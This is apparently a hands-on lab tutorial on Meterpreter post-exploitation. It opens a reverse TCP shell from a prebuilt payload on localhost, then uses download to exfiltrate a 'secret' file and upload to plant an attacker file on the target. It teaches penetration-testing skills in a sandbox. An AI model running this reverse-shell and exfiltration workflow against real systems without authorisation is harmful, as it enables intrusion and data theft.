Introduction
In this lab, you will learn the fundamental techniques for interacting with a target's file system using Meterpreter, an advanced payload that is part of the Metasploit Framework. Post-exploitation is a critical phase of a penetration test, and being able to navigate the file system, download sensitive files, and upload your own tools or scripts is an essential skill.
We will walk through the process of establishing a Meterpreter session and then use core commands such as ls, cd, download, upload, and cat to explore and manipulate files on the compromised system.
List files and directories with the ls command
In this step, we will first establish a Meterpreter session and then use the ls command to list the files on the target system. Our setup script has already created a payload (payload.elf) and a listener configuration file (listener.rc).
First, let's start the Metasploit listener. It will wait for an incoming connection from the payload. We use the -r flag to load our resource file, which automates the setup.
Open a terminal and run the following command:
msfconsole -r listener.rc
You will see the Metasploit console start up, and the handler will be running as a background job. The output will look similar to this:
[*] Msfconsole tip: Use the resource command to run a script of
console commands.
...
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 127.0.0.1:4444
msf6 >
Now, we need to execute the payload to connect to our listener. Open a new terminal by clicking the "+" icon in the terminal tab bar. In this new terminal, execute the payload file located in your ~/project directory.
./payload.elf
This command will produce no output. Switch back to your first terminal (the one running msfconsole). You should see a message indicating that a session has been opened.
[*] Sending stage (3021700 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:43916) at 2023-10-27 10:30:00 -0400
msf6 > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
Note: If you are not automatically placed into the session, you can list active sessions with
sessionsand interact with one usingsessions -i <ID>, for example,sessions -i 1.
You are now in a Meterpreter session, indicated by the meterpreter > prompt. Any command you type here is executed on the target machine. Let's use the ls command to list files in the current directory of the target.
ls
This will list the files and directories in the target's current working directory.
meterpreter > ls
Listing: /home/labex/project
============================
Mode Size Type Perms Name
---- ---- ---- ----- ----
100755/rwxr-xr-x 10152 fil rwx/- payload.elf
100644/rw-r--r-- 100 fil rw-/- listener.rc
Change directories with the cd command
In this step, you'll learn how to navigate the target's file system using the cd (change directory) command within Meterpreter. This works just like the standard Linux cd command.
Our setup script created a directory at /tmp/victim_files on the target system. Let's navigate into the /tmp directory.
cd /tmp
The command itself doesn't produce any output. To confirm that we have changed directories, we can use the pwd (print working directory) command.
pwd
The output will show your current directory on the target machine.
meterpreter > pwd
/tmp
Now that we are in the /tmp directory, let's list its contents with ls to find the victim_files directory.
ls
You should see the victim_files directory among the other files and directories in /tmp.
meterpreter > ls
Listing: /tmp
============
Mode Size Type Perms Name
---- ---- ---- ----- ----
...
40777/rwxrwxrwx 4096 dir rwx/- victim_files
...
Download a file from the target with the download command
In this step, we will download a file from the target system to our own machine. This is a crucial technique for exfiltrating data. We will use the download command.
First, let's navigate into the victim_files directory we found in the previous step.
cd victim_files
Now, list the files in this directory to find our target file.
ls
You will see the secret_notes.txt file that was created by the setup script.
meterpreter > ls
Listing: /tmp/victim_files
=========================
Mode Size Type Perms Name
---- ---- ---- ----- ----
100644/rw-r--r-- 37 fil rw-/- secret_notes.txt
Now, let's download this file to our local ~/project directory. The syntax is download <file_on_target>. By default, it will download to your current local directory.
download secret_notes.txt
You should see a confirmation message indicating the download was successful.
[*] Downloading: secret_notes.txt -> /home/labex/project/secret_notes.txt
[*] Downloaded 37.00 B of 37.00 B (100.0%)
[*] download : /tmp/victim_files/secret_notes.txt -> /home/labex/project/secret_notes.txt
To verify, you can open a new terminal (or use the second one you opened earlier) and list the files in your ~/project directory on your local machine.
ls ~/project
You should now see secret_notes.txt in the file list.
Upload a file to the target with the upload command
In this step, you will learn how to upload a file from your machine to the target system using the upload command. This is useful for placing tools, scripts, or other payloads on the target.
First, we need a file on our local machine to upload. Let's create one. In your local shell terminal (not the Meterpreter session), run the following command to create a file named attacker_file.txt.
echo "attacker data" > ~/project/attacker_file.txt
Now, switch back to your Meterpreter session. You should still be in the /tmp/victim_files directory on the target. We will upload attacker_file.txt from our local ~/project directory to the target's current directory.
The syntax is upload <local_file_path>.
upload /home/labex/project/attacker_file.txt
You will see a confirmation that the upload was successful.
[*] uploading: /home/labex/project/attacker_file.txt -> attacker_file.txt
[*] uploaded : /home/labex/project/attacker_file.txt -> attacker_file.txt
To confirm the file is on the target, run ls in your Meterpreter session.
ls
You should now see both secret_notes.txt and your newly uploaded attacker_file.txt.
meterpreter > ls
Listing: /tmp/victim_files
=========================
Mode Size Type Perms Name
---- ---- ---- ----- ----
100644/rw-r--r-- 14 fil rw-/- attacker_file.txt
100644/rw-r--r-- 37 fil rw-/- secret_notes.txt
View the contents of a text file with the cat command
In this final step, we'll use the cat command in Meterpreter to view the contents of files directly on the target's file system without having to download them first.
You should still be in the /tmp/victim_files directory on the target within your Meterpreter session.
First, let's view the contents of the original file, secret_notes.txt.
cat secret_notes.txt
The command will print the contents of the file directly to your console.
meterpreter > cat secret_notes.txt
This is a secret file from the target.
Next, let's view the contents of the file we uploaded, attacker_file.txt, to confirm it was transferred correctly.
cat attacker_file.txt
You should see the text we created on our local machine.
meterpreter > cat attacker_file.txt
attacker data
This command is extremely useful for quickly inspecting configuration files, logs, or scripts on the target system.
Summary
Congratulations on completing this lab! You have learned the essential Meterpreter commands for interacting with a target's file system.
You successfully established a Meterpreter session and practiced the following key post-exploitation commands:
ls: To list files and directories.cd: To navigate the file system.pwd: To identify the current working directory.download: To exfiltrate files from the target to your machine.upload: To place files from your machine onto the target.cat: To view the contents of text files directly on the target.
Mastering these commands is a fundamental step in becoming proficient with the Metasploit Framework and performing effective penetration tests.
